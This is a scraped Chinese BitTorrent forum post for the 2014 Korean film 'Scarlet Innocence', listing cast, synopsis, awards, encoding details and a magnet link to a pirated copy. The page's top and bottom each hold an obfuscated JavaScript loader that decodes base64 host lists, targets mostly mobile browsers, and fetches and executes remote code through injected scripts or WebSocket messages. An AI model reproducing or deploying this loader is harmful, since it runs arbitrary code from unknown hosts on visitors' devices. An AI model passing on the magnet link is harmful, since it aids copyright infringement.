布拉芙夫人[中文字幕].Scarlet.Innocence.2014.1080p.BluRay.x265.10bit.DTS 6.03GB

版主小s 1月前 1200

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 布拉芙夫人 / 情欲诱惑(港 / 台) / Scarlet Innocence

◎片 名 ?? ??

◎年 代 2014

◎产 地 韩国

◎类 别 爱情 / 惊悚 / 情色

◎语 言 韩语

◎上映日期 2014-10-02(韩国)

◎IMDb链接 https://www.imdb.com/title/tt3958014/

◎豆瓣评分 5.9/10 (16722人评价)

◎豆瓣链接 https://movie.douban.com/subject/10508874/

◎片 长 113分钟

◎导 演 任弼星 Pil-Sung Yim (id:1309401)

◎编 剧 张允美 Yoon-mi Jang (id:1345479)

任弼星 Pil-Sung Yim (id:1309401)

◎演 员 郑雨盛 Woo-sung Jung (id:1032365)

李絮 Esom E. (id:1322386)

朴晓英 So-young Park (id:1344902)

朴瑞妍 Park Seo Yeon (id:1366367)

朴素丹 So-dam Park (id:1343344)

李昶勋 Chang-hoon Lee (id:1388288)

韩珠英 Joo-young Han (id:1397675)

崔里浩 Choi Ri-ho (id:1374005)

柳顺雄 Soon-woong Yoo (id:1387807)

孙锡久 Sukku Son (id:1386567)

郑道元 Do-won Jung (id:1385927)

金智雄 Ji-woong Kim (id:1456146)

李圣贤 Mowg (id:1329977)

◎标 签 情色 / 韩国 / 韩国电影 / 郑雨盛 / 爱情 / 复仇 / 剧情 / 2014

◎简 介

大学教授学奎(郑雨盛 饰)因为一场性丑闻而失去了一切,被贬值到十分偏远的小镇任职。在那里,学奎遇见了美丽的少女德伊(李絮 饰),两人坠入爱河。然而,不久之后,学奎官复原职,即将回到大都市首尔,为了自己的前途,学奎残忍的抛弃了德伊。

一晃眼八年过去,此时的学奎已经成为了小有名气的作家,事业走上的巅峰,前途一片光明。可是,就在这个节骨眼上,他却患上了不治的眼疾,视力一天一天的退化下去。某日,学奎的隔壁搬来了一位名为世静的女子,世静待学奎十分亲切,在生活中对他无微不至。随着时间的推移,学奎觉得自己已经离不开世静了。然而,目不能视的学奎并不知道,世静的真正身份,正是曾被自己抛弃的德伊。

◎获奖情况 (共3项)

第35届韩国电影青龙奖 (2014)

最佳新人女演员(提名)

└──李絮 (id:1322386)

第51届百想艺术大赏 (2015)

电影类 最佳新人女演员(提名)

└──李絮 (id:1322386)

第51届韩国电影大钟奖 (2014)

最佳新人女演员(提名)

└──李絮 (id:1322386)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 123646436467449237078142979429558831177 (0x5D056FFCC8F7ADE4B39F38B850A2C849)

  4. Complete name : [email protected]COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.03 GiB

  8. Duration : 1 h 53 min

  9. Overall bit rate : 7 642 kb/s

  10. Encoded date : UTC 2021-10-17 12:48:43

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 53 min

  20. Bit rate : 6 117 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.128

  30. Stream size : 4.83 GiB (80%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. ID in the original source medium : 4353 (0x1101)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 53 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.19 GiB (20%)

  51. Language : Korean

  52. Default : Yes

  53. Forced : No

  54. Original source medium : Blu-ray


  55. Text #1

  56. ID : 3

  57. ID in the original source medium : 4609 (0x1201)

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 48 min

  63. Bit rate : 14.8 kb/s

  64. Count of elements : 1739

  65. Stream size : 11.5 MiB (0%)

  66. Title : chs

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4610 (0x1202)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 48 min

  79. Bit rate : 14.9 kb/s

  80. Count of elements : 1739

  81. Stream size : 11.6 MiB (0%)

  82. Title : cht

  83. Language : Chinese

  84. Default : No

  85. Forced : No

  86. Original source medium : Blu-ray


  87. Menu

  88. 00:00:00.000 : en:Chapter 01

  89. 00:15:44.958 : en:Chapter 02

  90. 00:26:34.083 : en:Chapter 03

  91. 00:35:40.541 : en:Chapter 04

  92. 00:49:51.541 : en:Chapter 05

  93. 01:03:08.041 : en:Chapter 06

  94. 01:16:03.166 : en:Chapter 07

  95. 01:23:55.416 : en:Chapter 08

  96. 01:34:13.250 : en:Chapter 09

  97. 01:48:43.333 : en:Chapter 10

  98. 01:52:20.916 : en:Chapter 11




复制代码


TAGS 惊悚 爱情

磁力链:
  • magnet:?xt=urn:btih:33105CF9070EF782E0DB5CBA3332EB5B146B410B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};